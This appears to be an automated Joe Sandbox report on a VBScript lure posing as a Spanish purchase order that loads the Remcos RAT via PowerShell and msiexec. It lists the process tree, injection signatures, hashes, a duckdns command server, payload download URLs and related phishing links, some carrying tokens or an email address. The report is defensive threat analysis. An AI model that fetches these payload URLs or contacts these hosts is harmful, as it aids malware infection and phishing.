Command and Control: 11 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 213 Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph ID: 1545815 | Sample: nOrden_de_Compra___0001245.vbs | Start date: 31/10/2024 | Architecture: WINDOWS | Score: 100

Contacted hosts:
fumecexpsales1international.duckdns.org (185.236.203.101, 49428, 49474, 49522; M247GB, Romania): Uses dynamic DNS services; contacted by msiexec.exe
torresvmackenna.cl (200.6.118.162, 443, 49401, 49705; IngenieriaeInformaticaAsociadaLtdaIIALtdaCL, Chile): contacted by powershell.exe (child of wscript.exe)
bg.microsoft.map.fastly.net

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures

Process tree:
wscript.exe
    Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Suspicious execution chain found
    powershell.exe
        Signatures: Found suspicious powershell code related to unpacking or dynamic code loading
        Network: torresvmackenna.cl
        conhost.exe
    WMIC.exe
        Signatures: Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
        conhost.exe
powershell.exe
    Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Queues an APC in another process (thread injection)
    msiexec.exe
        Signatures: Detected Remcos RAT; Installs a global keyboard hook
        Network: fumecexpsales1international.duckdns.org
        Dropped: C:\ProgramData\remcos\logs.dat (data)
    conhost.exe

Source | Detection | Scanner | Label
nOrden_de_Compra___0001245.vbs | 0% | ReversingLabs |
nOrden_de_Compra___0001245.vbs | 5% | Virustotal |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
bg.microsoft.map.fastly.net | 0% | Virustotal |
torresvmackenna.cl | 0% | Virustotal |

Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | unknown
fumecexpsales1international.duckdns.org | 185.236.203.101 | true | true | | unknown
torresvmackenna.cl | 200.6.118.162 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.bin | false | | unknown
https://torresvmackenna.cl/bin/Interplea.snp | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.2208076716.000001A2DAD9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
https://torresvmackenna.cl | powershell.exe, 00000004.00000002.2178361107.000001A2CB16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178361107.000001A2CC235000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000006.00000002.2389944244.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://torresvmackenna.cl | powershell.exe, 00000004.00000002.2178361107.000001A2CC96C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.binb | msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000004.00000002.2178361107.000001A2CB8C6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.2208076716.000001A2DAD9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.2178361107.000001A2CAD31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.2178361107.000001A2CAD31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2389944244.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.bin1 | msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://torresvmackenna.cl/bin/Interplea.snpP | powershell.exe, 00000004.00000002.2178361107.000001A2CAF55000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://torresvmackenna.cl/bin/Interplea.snpXR#l | powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.236.203.101 | fumecexpsales1international.duckdns.org | Romania | 9009 | M247GB | true
200.6.118.162 | torresvmackenna.cl | Chile | 27659 | IngenieriaeInformaticaAsociadaLtdaIIALtdaCL | false
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1545815
                                      Start date and time:2024-10-31 04:01:04 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 43s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:nOrden_de_Compra___0001245.vbs
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.expl.evad.winVBS@11/10@4/2
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 83%
                                      • Number of executed functions: 56
                                      • Number of non-executed functions: 19
                                      Cookbook Comments:
                                      • Found application associated with file extension: .vbs
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 199.232.210.172, 93.184.221.240
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target powershell.exe, PID 576 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 7108 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
23:01:55 | API Interceptor | 1x Sleep call for process: wscript.exe modified
23:01:57 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
23:01:59 | API Interceptor | 87x Sleep call for process: powershell.exe modified
23:03:16 | API Interceptor | 544301x Sleep call for process: msiexec.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.236.203.101 | IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs | Get hash | malicious | Remcos, GuLoader | Browse |
 | rIMG465244247443GULFORDEROpmagasinering.cmd | Get hash | malicious | Remcos, GuLoader | Browse |
 | rIMGTR657365756.bat | Get hash | malicious | Remcos, GuLoader | Browse |
 | 17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exe | Get hash | malicious | Remcos | Browse |
 | na.rtf | Get hash | malicious | Remcos | Browse |
 | DSpWOKW7zn.rtf | Get hash | malicious | Remcos | Browse |
 | Formularz instrukcji p#U0142atno#U015bci Millennium.xls | Get hash | malicious | Remcos | Browse |
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtf | Get hash | malicious | Remcos | Browse |
200.6.118.162 | https://capot.cl/xyttttopp///youngliving/6nowawyfqu4serw/eGx1b0B5b3VuZ2xpdmluZy5jb20= | Get hash | malicious | Unknown | Browse |
 | https://pub-9a6f1f3f7bf34c09ac13555d175cb570.r2.dev/comnkam.html | Get hash | malicious | HTMLPhisher | Browse |
 | https://pub-2598caa00dcf4c658bf8753f6761f962.r2.dev/compki.html | Get hash | malicious | HTMLPhisher | Browse |
 | https://pub-2598caa00dcf4c658bf8753f6761f962.r2.dev/compki.html | Get hash | malicious | HTMLPhisher | Browse |
 | https://pub-0b366962715b4b8ca9b67a32dc218dbf.r2.dev/bendel.html | Get hash | malicious | HTMLPhisher | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
bg.microsoft.map.fastly.net | http://hprus.conegutsud.com.pe/4zgrHK17910PyfC1508dysnmxbczx27005OLWUIBMTRFCEVBH25578NWDJ17331m12#2mzdvgfkgua042eh8kky7aanhr5dggelvb8fjk5yz6jna8o8e5 | Get hash | malicious | Phisher | Browse | 199.232.214.172
 | 0438.pdf.exe | Get hash | malicious | Unknown | Browse | 199.232.210.172
 | Paiement.eml | Get hash | malicious | HTMLPhisher | Browse | 199.232.214.172
 | https://pub-6838e3dd185d4df89d3bb3eabe6469a4.r2.dev/index.html# | Get hash | malicious | Unknown | Browse | 199.232.214.172
 | https:/click.mailchimp.com/track/click/30010842/docsend.com?p=eyJzIjoiT2RaN0hwNHlyY2E3VXl5TWcwMlA2eFpHVlN3IiwidiI6MSwicCI6IntcInVcIjozMDAxMDg0MixcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2RvY3NlbmQuY29tXFxcL3ZpZXdcXFwvZzZnYzZjazdtNHlkYTRpa1wiLFwiaWRcIjpcImNhZDg3NzI1Y2UzMjRiMzI4Yzk1ZGVkYWUyMzc4ZTZjXCIsXCJ1cmxfaWRzXCI6W1wiYzE5ZWU5NGJiMzA5YmZhOGQ2MDU3OGI1Mjk5NTFmOWE4NDQ0ODNhYVwiXX0ifQ#steven.davis@tu.edu | Get hash | malicious | HTMLPhisher | Browse | 199.232.210.172
 | https://jksvb.jnkpavers.com/?tZbf66=Tyw6/shhfkanxgsdff/&c=E,1,NSDuZCxGQc6fw5XDGugSpFh6vhsurKgNKuRtQYEvQblaeko7ktmOqkToectUm_5S_qV7IGwrOynGYnQ5TFSCJymAV2tc5TeuFegn96UyDZPOEKOyHYw,&typo=1 | Get hash | malicious | Unknown | Browse | 199.232.214.172
 | https://share.hsforms.com/11zbkP7dfTBO0LgTS5dCN0Asixz3 | Get hash | malicious | Mamba2FA | Browse | 199.232.214.172
 | https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5 | Get hash | malicious | Unknown | Browse | 199.232.210.172
 | (No subject) (100).eml | Get hash | malicious | Tycoon2FA | Browse | 199.232.210.172
 | 819614 - Midways Freight Ltd.xlsm | Get hash | malicious | Unknown | Browse | 199.232.210.172
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
M247GB | wZU2edEGL3.elf | Get hash | malicious | Unknown | Browse | 38.203.241.135
 | 8v2IShmMos.elf | Get hash | malicious | Unknown | Browse | 154.17.76.69
 | la.bot.sparc.elf | Get hash | malicious | Unknown | Browse | 38.202.225.97
 | Bjl3geiFEK.exe | Get hash | malicious | Phorpiex | Browse | 91.202.233.141
 | la.bot.arm5.elf | Get hash | malicious | Unknown | Browse | 38.95.109.107
 | la.bot.arm.elf | Get hash | malicious | Unknown | Browse | 38.207.55.140
 | nklppc.elf | Get hash | malicious | Unknown | Browse | 213.109.189.112
 | nabarm5.elf | Get hash | malicious | Unknown | Browse | 178.171.80.195
 | nklarm7.elf | Get hash | malicious | Unknown | Browse | 154.17.76.90
 | arm7.elf | Get hash | malicious | Unknown | Browse | 38.207.37.111
IngenieriaeInformaticaAsociadaLtdaIIALtdaCL | https://capot.cl/xyttttopp///youngliving/6nowawyfqu4serw/eGx1b0B5b3VuZ2xpdmluZy5jb20= | Get hash | malicious | Unknown | Browse | 200.6.118.162
 | https://pub-9a6f1f3f7bf34c09ac13555d175cb570.r2.dev/comnkam.html | Get hash | malicious | HTMLPhisher | Browse | 200.6.118.162
 | https://pub-2598caa00dcf4c658bf8753f6761f962.r2.dev/compki.html | Get hash | malicious | HTMLPhisher | Browse | 200.6.118.162
 | https://pub-2598caa00dcf4c658bf8753f6761f962.r2.dev/compki.html | Get hash | malicious | HTMLPhisher | Browse | 200.6.118.162
 | https://pub-0b366962715b4b8ca9b67a32dc218dbf.r2.dev/bendel.html | Get hash | malicious | HTMLPhisher | Browse | 200.6.118.162
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | Get hash | malicious | Stealc | Browse | 200.6.118.162
 | file.exe | Get hash | malicious | Unknown | Browse | 200.6.118.162
 | file.exe | Get hash | malicious | Unknown | Browse | 200.6.118.162
 | Paiement.eml | Get hash | malicious | HTMLPhisher | Browse | 200.6.118.162
 | PO 4500580954.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 200.6.118.162
 | CPYEzG7VGh.exe | Get hash | malicious | DCRat | Browse | 200.6.118.162
 | https://jpm-ghana-2024-election-conversation-with-oct-24.open-exchange.net/join-the-call?ml_access_token=eyJjb250ZW50Ijp7ImV4cGlyYXRpb25EYXRlIjoiMjAyNC0xMC0zMVQxNToyMDo1OS4wMDZaIiwiZW1haWwiOiJyZGVpdHpAdnItY2FwaXRhbC5jb20iLCJldmVudElkIjo0MjY3Mn0sInNpZ25hdHVyZSI6Ik1FVUNJQzhaMDJJblVZd0syUk9WRkdjL1pMNHRBbWo4RmwxdW9mQjhwZzRmSjZsMkFpRUE5d25HUFFoa3ZrdkM2MlJkQ3lkM09YbnFJZ0xlQTAwMDIxNlRWbG9Hb0ZjPSJ9 | Get hash | malicious | Unknown | Browse | 200.6.118.162
 | SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe | Get hash | malicious | AgentTesla | Browse | 200.6.118.162
 | http://ffcu.online | Get hash | malicious | Unknown | Browse | 200.6.118.162
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 200.6.118.162
37f463bf4616ecd445d4a1937da06e19 | Ky4J8k89A7.exe | Get hash | malicious | Stealc, Vidar, Xmrig | Browse | 200.6.118.162
 | b4s45TboUL.exe | Get hash | malicious | Stealc, Vidar | Browse | 200.6.118.162
 | rCommercialoffer_Technicaloffer_pdf.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 200.6.118.162
 | Justificante de pago.exe | Get hash | malicious | FormBook, GuLoader | Browse | 200.6.118.162
 | rPO-000172483.exe | Get hash | malicious | FormBook, GuLoader | Browse | 200.6.118.162
 | rPO-000172483.exe | Get hash | malicious | FormBook, GuLoader | Browse | 200.6.118.162
 | Ppto.24265.exe | Get hash | malicious | FormBook, GuLoader | Browse | 200.6.118.162
 | Factura Honorarios 2024-10.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 200.6.118.162
 | Stadigheder43.exe | Get hash | malicious | FormBook, GuLoader | Browse | 200.6.118.162
 | Forreste.exe | Get hash | malicious | FormBook, GuLoader | Browse | 200.6.118.162
                                                                No context
                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):144
                                                                Entropy (8bit):3.3378527165164744
                                                                Encrypted:false
                                                                SSDEEP:3:rhlKlM+Wl3l8VlNRlI5JWRal2Jl+7R0DAlBG45klovDl6v:6lw/5YcIeeDAlOWAv
                                                                MD5:1996C3A93DF3BC0A9D18679B930FE8FE
                                                                SHA1:57224E6025519371731171F264380FE504B8A49D
                                                                SHA-256:1FAE00BEDCD248C9A88B9A04095CC2614544B8D4E04FD129677A431CE79BB4E0
                                                                SHA-512:6112E57BA9760CC7240371D73AB954E398C61A342277B0B643C80E0D7978F0BF0FF07549C82937FBEDF433732C83160E61093026FA224EA5BF31EC19C98B4C29
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                Reputation:low
                                                                Preview:....[.2.0.2.4./.1.0./.3.0. .2.3.:.0.2.:.4.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                Process:C:\Windows\System32\wscript.exe
                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                Category:dropped
                                                                Size (bytes):71954
                                                                Entropy (8bit):7.996617769952133
                                                                Encrypted:true
                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                Process:C:\Windows\System32\wscript.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):328
                                                                Entropy (8bit):3.2539954282295116
                                                                Encrypted:false
                                                                SSDEEP:6:kKBAE9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:5SDImsLNkPlE99SNxAhUe/3
                                                                MD5:D08FD6A9F7CB5F7AFD1E034AD5BB4267
                                                                SHA1:7ECB052953A0C6548E1D66048F40FFEFC946505C
                                                                SHA-256:85D8845F38E6D6DC52141D218771CABF1FDE32D0A62C38E56B05293774F28AB4
                                                                SHA-512:AF4610F93B8095EF99D8CB6D68C05E7F8D2AA8A4BC3CD47E7B307F7FF8D4862037F6D2855890438EC44809FEE883A562CC36E3A9CD78ABF2CCFFECEF5EC7A8EC
                                                                Malicious:false
                                                                Preview:p...... ........D.{>A+..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):8003
                                                                Entropy (8bit):4.840877972214509
                                                                Encrypted:false
                                                                SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                MD5:106D01F562D751E62B702803895E93E0
                                                                SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                Malicious:false
                                                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1940658735648508
                                                                Encrypted:false
                                                                SSDEEP:3:Nlllulbnolz:NllUc
                                                                MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                Malicious:false
                                                                Preview:@...e................................................@..........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):440056
                                                                Entropy (8bit):5.938712761470363
                                                                Encrypted:false
                                                                SSDEEP:6144:QiTqgwtPdNsRh8cuNvydzRC1kmRrx6u5aNtpnZ6uxngTO1NY7gn0L1sJhxCcJwH3:QiTqHejuNa6k6rIu4tZJtRisn0ahMS4x
                                                                MD5:FFDFC961099B3A61A7CFA09AB2ED144D
                                                                SHA1:A6CCB58EB8E3B9F2C0064A7BB68810C90B2F3CEA
                                                                SHA-256:E9E24E5E5941176D36D390CB936A8689D3AC767D4AC680392F9E63C6D4F22F70
                                                                SHA-512:643C23FD4DEB807D101B981BE5C62DD34096FF92E633246CA653C542F04B15EEC2241170FBF53C4F5E726F539CB975B1F39C2B749B16E40C8955E1D57EF083E4
                                                                Malicious:false
                                                                File type:ASCII text, with CRLF line terminators
                                                                Entropy (8bit):5.214754309343031
                                                                TrID:
                                                                • Visual Basic Script (13500/0) 100.00%
                                                                File name:nOrden_de_Compra___0001245.vbs
                                                                File size:21'057 bytes
                                                                MD5:44f5fc0dbe40738a8d1da8a520c37ade
                                                                SHA1:1ae7e777e876136b30aec574f10215ef672ff451
                                                                SHA256:4c9a883ec5718156811bee47cca44c3115f1dcb04ecc6541192e807ec1952e85
                                                                SHA512:125dfb8044f936b7f542a9dddc8190fd17a07c550d1a44e9498c59b7cfa1c0912c472527f219b26cef7d8fd540558ed7823361108deec111a657f4a4c8431062
